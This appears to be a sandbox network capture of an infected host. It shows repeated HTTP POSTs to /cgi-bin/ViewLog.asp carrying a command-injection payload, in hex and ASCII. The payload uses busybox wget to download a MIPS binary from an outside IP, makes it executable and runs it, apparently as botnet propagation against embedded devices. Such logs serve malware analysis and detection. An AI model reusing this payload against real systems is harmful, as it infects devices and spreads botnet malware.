                                              Nov 23, 2023 05:17:41.930452108 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:42.128799915 CET556INHTTP/1.1 400 Bad Request
                                              Date: Thu, 23 Nov 2023 04:17:42 GMT
                                              Server: Apache
                                              Connection: close
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><p>Additionally, a 403 Forbiddenerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              501192.168.2.133978062.97.60.2248080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:41.932157040 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:42.130345106 CET589INHTTP/1.1 404 Not Found
                                              Content-Type: text/html
                                              X-Frame-Options: SAMEORIGIN
                                              Content-Length: 341
                                              Connection: close
                                              Date: Thu, 23 Nov 2023 05:17:26 GMT
                                              Server: lighttpd/1.4.55
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>404 Not Found</title> </head> <body> <h1>404 Not Found</h1> </body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              502192.168.2.135980285.214.227.2068080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:41.933163881 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:42.132504940 CET1246INHTTP/1.1 404 Not Found
                                              Server: Apache-Coyote/1.1
                                              Content-Type: text/html;charset=utf-8
                                              Content-Language: en
                                              Content-Length: 1007
                                              Date: Thu, 23 Nov 2023 04:17:42 GMT
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 35 32 20 28 55 62 75 6e 74 75 29 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 68 31 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 20 3c 75 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 75 3e 3c 2f 70 3e 3c 70 3e 3c 62 3e 64 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 3c 75 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 75 3e 3c 2f 70 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 35 32 20 28 55 62 75 6e 74 75 29 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <html><head><title>Apache Tomcat/7.0.52 (Ubuntu) - Error report</title><style>...H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></style> </head><body><h1>HTTP Status 404 - /cgi-bin/ViewLog.asp</h1><HR size="1" noshade="noshade"><p><b>type</b> Status report</p><p><b>message</b> <u>/cgi-bin/ViewLog.asp</u></p><p><b>description</b> <u>The requested resource is not available.</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/7.0.52 (Ubuntu)</h3></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              503192.168.2.136093662.195.108.188080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:41.937495947 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              504192.168.2.135680494.121.74.348080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:41.953222990 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              505192.168.2.133516694.122.7.1328080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:41.957237005 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              506192.168.2.135525295.38.234.1748080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:42.021027088 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:42.317069054 CET313INHTTP/1.1 501 Not Implemented
                                              Connection: Keep-Alive
                                              Content-Length: 121
                                              Date: Wed, 17 May 2023 10:25:45 GMT
                                              Expires: 0
                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 35 30 31 3a 20 4e 6f 74 20 49 6d 70 6c 65 6d 65 6e 74 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 45 72 72 6f 72 20 35 30 31 3a 20 4e 6f 74 20 49 6d 70 6c 65 6d 65 6e 74 65 64 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <html><head><title>Error 501: Not Implemented</title></head><body><h1>Error 501: Not Implemented</h1></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              507192.168.2.135668885.209.179.1688080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:42.049978971 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              508192.168.2.135776294.121.140.1418080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:42.156913042 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:43.334321976 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:44.710243940 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:47.558265924 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:53.190217972 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:04.198276997 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              509192.168.2.135950494.199.196.2308080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:42.491565943 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              510192.168.2.134689461.139.119.21923
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:42.506664038 CET233INHTTP/1.0 200 OK
                                              Server: Proxy
                                              Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 39 2e 31 34 39 2e 31 38 2e 36 30 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 33 2d 31 31 2d 32 33 20 31 32 3a 31 37 3a 33 36 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a
                                              Data Ascii: Unauthorized ...IP Address: 89.149.18.60MAC Address: Server Time: 2023-11-23 12:17:36Auth Result: .


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              511192.168.2.133881831.136.185.2368080
                                              TimestampBytes transferredDirectionData
